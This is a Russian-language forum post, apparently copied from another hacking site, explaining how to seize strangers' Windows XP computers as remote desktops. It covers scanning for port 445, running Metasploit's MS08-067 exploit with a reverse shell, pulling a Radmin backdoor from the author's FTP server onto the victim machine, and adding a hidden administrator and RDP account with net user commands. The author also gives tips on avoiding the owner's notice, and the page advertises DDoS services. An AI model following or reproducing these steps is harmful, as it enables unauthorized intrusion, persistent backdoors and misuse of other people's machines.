Перейти к содержимому

 Друзья: Всё для вебмастера | [ Реклама на форуме ]


Rutor
Rutor


[ DDos Услуги. DDos атака. Заказать ДДос ]


Получение дедика с помощью Metasploit


  • Авторизуйтесь для ответа в теме
В этой теме нет ответов

#1
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
Дедик или поможет нам Metasploit 3.2. by stopxaker
Начну с того порядком уже надоело читать как люди ищут дедик , просят их , я уже писал , что мы ходим по этим дедикам , проксям и тд и тп .

Сегодня мы рассмотрим метод добычи дедика по средством Metasploit 3.2 с эксплойтом MS08-067_netapi который использует уязвимость в службе SMB на 445 порту , уязвимы все Windows XP Pro sp2 и sp3 , скачать Metasploit 3.2 можно от сюда ]]>http://www.metasploit.com/]]> , теперь скачаем сканер портов , я использую ip angry версии 2.21 она мне больше почему нравиться , офсайт ]]>http://www.angryziber.com/w/Download]]> , предположим что всё это мы уже скачали и установлил , запускаем сканер портов отметив в сканере порт 445 , именно он нам очень нужен , если просканировав сеть вы не увидели наличие открытого 445 порта в этой сети делать нечего , если же такой порт имеется то это очень даже хорошо!

Изображение

Затем в Метасплойт в дальшейшем МС , находим эксплойт MS08-067_netapi жмём выполнить

Изображение

Выбор цели Автомат , Payloads =generic/shell_reverse_tcp в RHOST ip жертвы и жмём применить , если уязвимость существует вы получите шелл (cmd.exe) удалённого компьютера , а в окошке Sessions появиться ip жертвы

Изображение

Предположим что FTP сервер у нас установлен и настроен , в cmd пишем
C:\>ftp
ftp> o
К 10.xx.xx.xx
Связь с 10.xx.xx.xx .
220 Welcome to 10.xx.xx.xx   FTP service.
Я настроил фтп на anonymous без пароля , ну вот мы зашли на свой фтп , смотрим где что у нас лежит командой
dir
Видим что лежит наш уже приготовленный радмин-сервер sys.exe зальём его на комп жертвы

Изображение

get sys.exe
bye
Файл залит , выходим с фтп и возвращаемся а наш шелл

Изображение

смотрим залит ли файл

Изображение

и запускаем его
C:>sys.exe

Изображение

Теперь запустим RadminViewer и пробуем приконектится к нашему залитому и запущенному радмин-серверу

Изображение

Замечательно конект есть , вбиваем наш пароль и вот мы дома

Изображение

Теперь в радмине выбираем режим "Передачи файлов и загружаем наш terminal.exe , который сделает нам дедик на этом компьютере , хотя можно сделать учётки и в ручную
cmd
net user user pass /add
net localgroup Administrators user /add
net localgroup "Remote Desktop Users" user /add
net accounts /maxpwage:unlimited
exit

Изображение

Далее радмином в режиме "Телнет " запустим наш terminal.exe :

Изображение


Затем "Подключение к удаленному рабочему столу" и пробуем приконектимся к нашему свежеиспечёному дедику

Как видите на скрине показанно , что если мы сейчас нажём "ДА" то админа может выкинуть из свой сессии , и он может заподозрить что то не ладное в своей системе , как правило это может , повторяют может лечиться перезагрузкой компьютера , но помогает не всегда ! 50/50

Изображение

Вы спросите почему я сразу не залил terminal.exe , отвечаю буквы в шелле отображаются кракозябрами и скорость в дедике сами понимаете , так что мне важно был залить радмина , а там уже дело техники.
Ну вот у нас есть дедик, на нём мы может установить прокси , фпт и многое многое другое , примерно в течении часа получилось 5 дедиков , я думаю это не плохо !

PS: Всё тут написанное не претендует на статью , теперь от себя хочу сказать следующие этот метод всё равно требует времени и терпения , если кто-то хочет жать на кнопку "применить в Местаслойте" и чтобы он вам выкидывал готовые деды , ИДЕТЕ ЛЕСОМ.

Взято с grabberz.com

Ссылки из под хайдов не выдаю!



Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных